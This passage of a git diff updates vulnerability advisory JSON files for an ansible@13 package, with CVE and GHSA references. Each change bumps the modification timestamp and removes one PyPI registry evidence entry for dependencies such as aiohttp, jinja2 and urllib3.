"2026-09-10T18:51:29Z", "upstream": [ "GHSA-h24r-m9qc-pvpg", "CVE-2024-0690", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-11079.json b/advisories/BREW-ansible@13-CVE-2024-11079.json index dafeae4e42..d441d7ab3f 100644 --- a/advisories/BREW-ansible@13-CVE-2024-11079.json +++ b/advisories/BREW-ansible@13-CVE-2024-11079.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-11079", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-99w6-3xph-cx78", "CVE-2024-11079", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-22195.json b/advisories/BREW-ansible@13-CVE-2024-22195.json index f79645636f..aedb9f28db 100644 --- a/advisories/BREW-ansible@13-CVE-2024-22195.json +++ b/advisories/BREW-ansible@13-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-22195", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-23334.json b/advisories/BREW-ansible@13-CVE-2024-23334.json index 74a4551886..7f4f643ab5 100644 --- a/advisories/BREW-ansible@13-CVE-2024-23334.json +++ b/advisories/BREW-ansible@13-CVE-2024-23334.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-23334", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5h86-8mv2-jq9f", "CVE-2024-23334", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-23829.json b/advisories/BREW-ansible@13-CVE-2024-23829.json index c332496141..152fd9b281 100644 --- a/advisories/BREW-ansible@13-CVE-2024-23829.json +++ b/advisories/BREW-ansible@13-CVE-2024-23829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-23829", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8qpw-xqxj-h4r2", "CVE-2024-23829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-27306.json b/advisories/BREW-ansible@13-CVE-2024-27306.json index 10d4ff9656..15742b730b 100644 --- a/advisories/BREW-ansible@13-CVE-2024-27306.json +++ b/advisories/BREW-ansible@13-CVE-2024-27306.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-27306", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-7gpw-8wmc-pm8g", "CVE-2024-27306", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-30251.json b/advisories/BREW-ansible@13-CVE-2024-30251.json index c8bb71e237..ca19c422a8 100644 --- a/advisories/BREW-ansible@13-CVE-2024-30251.json +++ b/advisories/BREW-ansible@13-CVE-2024-30251.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-30251", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5m98-qgg9-wh84", "CVE-2024-30251", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-34064.json b/advisories/BREW-ansible@13-CVE-2024-34064.json index 429a956e92..3372ff7768 100644 --- a/advisories/BREW-ansible@13-CVE-2024-34064.json +++ b/advisories/BREW-ansible@13-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-34064", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-35195.json b/advisories/BREW-ansible@13-CVE-2024-35195.json index 2b8733ea82..1b9da6f548 100644 --- a/advisories/BREW-ansible@13-CVE-2024-35195.json +++ b/advisories/BREW-ansible@13-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-35195", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-3651.json b/advisories/BREW-ansible@13-CVE-2024-3651.json index 8364a74dd8..9bf28caf91 100644 --- a/advisories/BREW-ansible@13-CVE-2024-3651.json +++ b/advisories/BREW-ansible@13-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-3651", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-37891.json b/advisories/BREW-ansible@13-CVE-2024-37891.json index 1f4335bb73..26c97c2ebf 100644 --- a/advisories/BREW-ansible@13-CVE-2024-37891.json +++ b/advisories/BREW-ansible@13-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-37891", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-42367.json b/advisories/BREW-ansible@13-CVE-2024-42367.json index bfcfb2983d..2b621bc162 100644 --- a/advisories/BREW-ansible@13-CVE-2024-42367.json +++ b/advisories/BREW-ansible@13-CVE-2024-42367.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-42367", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jwhx-xcg6-8xhj", "CVE-2024-42367", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-47081.json b/advisories/BREW-ansible@13-CVE-2024-47081.json index beb2d85265..8937aea1b2 100644 --- a/advisories/BREW-ansible@13-CVE-2024-47081.json +++ b/advisories/BREW-ansible@13-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-47081", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-52303.json b/advisories/BREW-ansible@13-CVE-2024-52303.json index 4fa3764358..00f69c418a 100644 --- a/advisories/BREW-ansible@13-CVE-2024-52303.json +++ b/advisories/BREW-ansible@13-CVE-2024-52303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-52303", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-27mf-ghqm-j3j8", "CVE-2024-52303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-52304.json b/advisories/BREW-ansible@13-CVE-2024-52304.json index 2f15aa63ba..4c39053d78 100644 --- a/advisories/BREW-ansible@13-CVE-2024-52304.json +++ b/advisories/BREW-ansible@13-CVE-2024-52304.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-52304", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8495-4g3g-x7pr", "CVE-2024-52304", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-56201.json b/advisories/BREW-ansible@13-CVE-2024-56201.json index a744314258..039196924c 100644 --- a/advisories/BREW-ansible@13-CVE-2024-56201.json +++ b/advisories/BREW-ansible@13-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-56201", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-56326.json b/advisories/BREW-ansible@13-CVE-2024-56326.json index f4e95367c9..bf18531a6b 100644 --- a/advisories/BREW-ansible@13-CVE-2024-56326.json +++ b/advisories/BREW-ansible@13-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-56326", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-6345.json b/advisories/BREW-ansible@13-CVE-2024-6345.json index 88370595b9..9f0386bd61 100644 --- a/advisories/BREW-ansible@13-CVE-2024-6345.json +++ b/advisories/BREW-ansible@13-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-6345", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-8775.json b/advisories/BREW-ansible@13-CVE-2024-8775.json index c11cacda77..a876d39bed 100644 --- a/advisories/BREW-ansible@13-CVE-2024-8775.json +++ b/advisories/BREW-ansible@13-CVE-2024-8775.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-8775", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jpxc-vmjf-9fcj", "CVE-2024-8775", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-9902.json b/advisories/BREW-ansible@13-CVE-2024-9902.json index 3b6d4a2fdc..9ba1d34a91 100644 --- a/advisories/BREW-ansible@13-CVE-2024-9902.json +++ b/advisories/BREW-ansible@13-CVE-2024-9902.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-9902", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-32p4-gm2c-wmch", "CVE-2024-9902", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-14010.json b/advisories/BREW-ansible@13-CVE-2025-14010.json index e6e83e7f85..34f1642a01 100644 --- a/advisories/BREW-ansible@13-CVE-2025-14010.json +++ b/advisories/BREW-ansible@13-CVE-2025-14010.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-14010", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8ggh-xwr9-3373", "CVE-2025-14010", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-27516.json b/advisories/BREW-ansible@13-CVE-2025-27516.json index 55959e0590..2d1ed0709e 100644 --- a/advisories/BREW-ansible@13-CVE-2025-27516.json +++ b/advisories/BREW-ansible@13-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-27516", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-47273.json b/advisories/BREW-ansible@13-CVE-2025-47273.json index bc5187fc31..0281814920 100644 --- a/advisories/BREW-ansible@13-CVE-2025-47273.json +++ b/advisories/BREW-ansible@13-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-47273", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-50181.json b/advisories/BREW-ansible@13-CVE-2025-50181.json index cdad145749..e450a88063 100644 --- a/advisories/BREW-ansible@13-CVE-2025-50181.json +++ b/advisories/BREW-ansible@13-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-50181", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-50182.json b/advisories/BREW-ansible@13-CVE-2025-50182.json index 9159fd083d..e9324ea324 100644 --- a/advisories/BREW-ansible@13-CVE-2025-50182.json +++ b/advisories/BREW-ansible@13-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-50182", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-53643.json b/advisories/BREW-ansible@13-CVE-2025-53643.json index 82593f296d..96caff3656 100644 --- a/advisories/BREW-ansible@13-CVE-2025-53643.json +++ b/advisories/BREW-ansible@13-CVE-2025-53643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-53643", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9548-qrrj-x5pj", "CVE-2025-53643", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-61911.json b/advisories/BREW-ansible@13-CVE-2025-61911.json index 454e5a3558..5387d923fb 100644 --- a/advisories/BREW-ansible@13-CVE-2025-61911.json +++ b/advisories/BREW-ansible@13-CVE-2025-61911.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-61911", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r7r6-cc7p-4v5m", "CVE-2025-61911", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-ldap", - "subject_version": "3.4.7", - "key": "pkg:pypi/python-ldap@3.4.7", - "resource": "python-ldap" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-61912.json b/advisories/BREW-ansible@13-CVE-2025-61912.json index 59506dd076..06d7a0f739 100644 --- a/advisories/BREW-ansible@13-CVE-2025-61912.json +++ b/advisories/BREW-ansible@13-CVE-2025-61912.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-61912", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p34h-wq7j-h5v6", "CVE-2025-61912", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-ldap", - "subject_version": "3.4.7", - "key": "pkg:pypi/python-ldap@3.4.7", - "resource": "python-ldap" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-66418.json b/advisories/BREW-ansible@13-CVE-2025-66418.json index 32b3aac88c..8e99c974d6 100644 --- a/advisories/BREW-ansible@13-CVE-2025-66418.json +++ b/advisories/BREW-ansible@13-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-66418", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-66471.json b/advisories/BREW-ansible@13-CVE-2025-66471.json index 37915e7797..b6c48efe8e 100644 --- a/advisories/BREW-ansible@13-CVE-2025-66471.json +++ b/advisories/BREW-ansible@13-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-66471", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69223.json b/advisories/BREW-ansible@13-CVE-2025-69223.json index 4253715a8b..775d795039 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69223.json +++ b/advisories/BREW-ansible@13-CVE-2025-69223.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69223", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6mq8-rvhq-8wgg", "CVE-2025-69223", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69224.json b/advisories/BREW-ansible@13-CVE-2025-69224.json index 259a341aea..f5cb0c0eff 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69224.json +++ b/advisories/BREW-ansible@13-CVE-2025-69224.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69224", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-69f9-5gxw-wvc2", "CVE-2025-69224", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69225.json b/advisories/BREW-ansible@13-CVE-2025-69225.json index cce42ffcdb..a19ad58565 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69225.json +++ b/advisories/BREW-ansible@13-CVE-2025-69225.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69225", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mqqc-3gqh-h2x8", "CVE-2025-69225", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69226.json b/advisories/BREW-ansible@13-CVE-2025-69226.json index 0b93693aa8..e3c74e891a 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69226.json +++ b/advisories/BREW-ansible@13-CVE-2025-69226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69226", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-54jq-c3m8-4m76", "CVE-2025-69226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69227.json b/advisories/BREW-ansible@13-CVE-2025-69227.json index e8ca8d1069..ded6aa01a2 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69227.json +++ 